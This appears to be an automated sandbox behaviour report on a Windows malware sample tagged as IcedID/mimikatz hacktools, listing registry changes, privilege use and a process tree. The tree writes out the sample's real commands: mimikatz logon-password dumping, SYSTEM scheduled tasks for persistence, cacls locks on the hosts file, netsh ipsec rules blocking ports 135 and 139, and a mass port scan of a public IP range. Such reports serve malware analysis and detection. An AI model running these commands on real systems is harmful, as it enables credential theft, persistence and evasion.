\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlifiji.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regnzlibv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kbebvutsd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cuwoqc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlifiji.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2584 cmd.exe 2344 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c82-6.dat nsis_installer_2 behavioral2/files/0x0007000000023c9e-15.dat nsis_installer_1 behavioral2/files/0x0007000000023c9e-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ wlifiji.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2344 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4828 schtasks.exe 4764 schtasks.exe 1444 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1716 wlifiji.exe Token: SeDebugPrivilege 3680 wlifiji.exe Token: SeDebugPrivilege 3136 vfshost.exe Token: SeDebugPrivilege 1628 bteqliisl.exe Token: SeLockMemoryPrivilege 1092 nfquyl.exe Token: SeLockMemoryPrivilege 1092 nfquyl.exe Token: SeDebugPrivilege 4896 bteqliisl.exe Token: SeDebugPrivilege 4500 bteqliisl.exe Token: SeDebugPrivilege 2424 bteqliisl.exe Token: SeDebugPrivilege 3852 bteqliisl.exe Token: SeDebugPrivilege 2676 bteqliisl.exe Token: SeDebugPrivilege 1724 bteqliisl.exe Token: SeDebugPrivilege 4712 bteqliisl.exe Token: SeDebugPrivilege 2632 bteqliisl.exe Token: SeDebugPrivilege 5032 bteqliisl.exe Token: SeDebugPrivilege 1308 bteqliisl.exe Token: SeDebugPrivilege 1828 bteqliisl.exe Token: SeDebugPrivilege 1100 bteqliisl.exe Token: SeDebugPrivilege 2100 bteqliisl.exe Token: SeDebugPrivilege 4292 bteqliisl.exe Token: SeDebugPrivilege 1068 bteqliisl.exe Token: SeDebugPrivilege 1832 bteqliisl.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe 1716 wlifiji.exe 1716 wlifiji.exe 3680 wlifiji.exe 3680 wlifiji.exe 4384 xohudmc.exe 1924 cuwoqc.exe 4924 wlifiji.exe 4924 wlifiji.exe 4924 wlifiji.exe 4924 wlifiji.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 384 wrote to memory of 2584 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe 83 PID 384 wrote to memory of 2584 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe 83 PID 384 wrote to memory of 2584 384 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe 83 PID 2584 wrote to memory of 2344 2584 cmd.exe 85 PID 2584 wrote to memory of 2344 2584 cmd.exe 85 PID 2584 wrote to memory of 2344 2584 cmd.exe 85 PID 2584 wrote to memory of 1716 2584 cmd.exe 87 PID 2584 wrote to memory of 1716 2584 cmd.exe 87 PID 2584 wrote to memory of 1716 2584 cmd.exe 87 PID 3680 wrote to memory of 4404 3680 wlifiji.exe 89 PID 3680 wrote to memory of 4404 3680 wlifiji.exe 89 PID 3680 wrote to memory of 4404 3680 wlifiji.exe 89 PID 4404 wrote to memory of 2176 4404 cmd.exe 91 PID 4404 wrote to memory of 2176 4404 cmd.exe 91 PID 4404 wrote to memory of 2176 4404 cmd.exe 91 PID 4404 wrote to memory of 2612 4404 cmd.exe 92 PID 4404 wrote to memory of 2612 4404 cmd.exe 92 PID 4404 wrote to memory of 2612 4404 cmd.exe 92 PID 4404 wrote to memory of 3476 4404 cmd.exe 93 PID 4404 wrote to memory of 3476 4404 cmd.exe 93 PID 4404 wrote to memory of 3476 4404 cmd.exe 93 PID 4404 wrote to memory of 1688 4404 cmd.exe 94 PID 4404 wrote to memory of 1688 4404 cmd.exe 94 PID 4404 wrote to memory of 1688 4404 cmd.exe 94 PID 4404 wrote to memory of 2532 4404 cmd.exe 96 PID 4404 wrote to memory of 2532 4404 cmd.exe 96 PID 4404 wrote to memory of 2532 4404 cmd.exe 96 PID 4404 wrote to memory of 4420 4404 cmd.exe 97 PID 4404 wrote to memory of 4420 4404 cmd.exe 97 PID 4404 wrote to memory of 4420 4404 cmd.exe 97 PID 3680 wrote to memory of 3332 3680 wlifiji.exe 98 PID 3680 wrote to memory of 3332 3680 wlifiji.exe 98 PID 3680 wrote to memory of 3332 3680 wlifiji.exe 98 PID 3680 wrote to memory of 2376 3680 wlifiji.exe 100 PID 3680 wrote to memory of 2376 3680 wlifiji.exe 100 PID 3680 wrote to memory of 2376 3680 wlifiji.exe 100 PID 3680 wrote to memory of 3232 3680 wlifiji.exe 102 PID 3680 wrote to memory of 3232 3680 wlifiji.exe 102 PID 3680 wrote to memory of 3232 3680 wlifiji.exe 102 PID 3680 wrote to memory of 3596 3680 wlifiji.exe 116 PID 3680 wrote to memory of 3596 3680 wlifiji.exe 116 PID 3680 wrote to memory of 3596 3680 wlifiji.exe 116 PID 3596 wrote to memory of 1696 3596 cmd.exe 118 PID 3596 wrote to memory of 1696 3596 cmd.exe 118 PID 3596 wrote to memory of 1696 3596 cmd.exe 118 PID 1696 wrote to memory of 3352 1696 wpcap.exe 119 PID 1696 wrote to memory of 3352 1696 wpcap.exe 119 PID 1696 wrote to memory of 3352 1696 wpcap.exe 119 PID 3352 wrote to memory of 388 3352 net.exe 121 PID 3352 wrote to memory of 388 3352 net.exe 121 PID 3352 wrote to memory of 388 3352 net.exe 121 PID 1696 wrote to memory of 2540 1696 wpcap.exe 122 PID 1696 wrote to memory of 2540 1696 wpcap.exe 122 PID 1696 wrote to memory of 2540 1696 wpcap.exe 122 PID 2540 wrote to memory of 852 2540 net.exe 124 PID 2540 wrote to memory of 852 2540 net.exe 124 PID 2540 wrote to memory of 852 2540 net.exe 124 PID 1696 wrote to memory of 3840 1696 wpcap.exe 125 PID 1696 wrote to memory of 3840 1696 wpcap.exe 125 PID 1696 wrote to memory of 3840 1696 wpcap.exe 125 PID 3840 wrote to memory of 2064 3840 net.exe 127 PID 3840 wrote to memory of 2064 3840 net.exe 127 PID 3840 wrote to memory of 2064 3840 net.exe 127 PID 1696 wrote to memory of 4428 1696 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2000
-
C:\Windows\TEMP\evfeutbbp\nfquyl.exe"C:\Windows\TEMP\evfeutbbp\nfquyl.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yqqdgivv\wlifiji.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2344
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1716
-
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2532
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3332
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3232
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\ysudwuiub\tluvwvuph\wpcap.exeC:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:852
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:5012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3444
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1520 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4440 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exeC:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ysudwuiub\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4700 -
C:\Windows\ysudwuiub\Corporate\vfshost.exeC:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4828
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:396
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:884
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3968
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1768
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3840
-
-
